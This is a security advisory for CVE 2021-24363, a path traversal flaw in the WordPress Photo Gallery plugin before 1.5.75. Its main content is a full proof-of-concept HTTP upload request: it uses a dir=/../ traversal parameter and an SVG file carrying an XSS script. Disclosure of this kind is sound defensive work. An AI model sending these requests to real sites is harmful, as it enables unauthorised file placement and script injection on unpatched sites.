Photo Gallery < 1.5.75 – File Upload Path Traversal | CVE 2021-24363

Description

The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images/SVG anywhere in the filesystem via a path traversal vector

Proof of Concept

The below requests will put the xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/

POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action=bwg_UploadHandler&dir=/../ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165
Content-Length: 1841
Connection: close
Cookie: [high privilege user, such as admin]

-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="bwg_nonce"

d0b8d99404
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_width"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_height"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_width"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_height"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="callback"

bwg_add_image
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_by"

date_modified
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_order"

desc
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="items_view"

thumbs
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">alert(document.domain);</script>
</svg>

-----------------------------61502566032120876251044562165--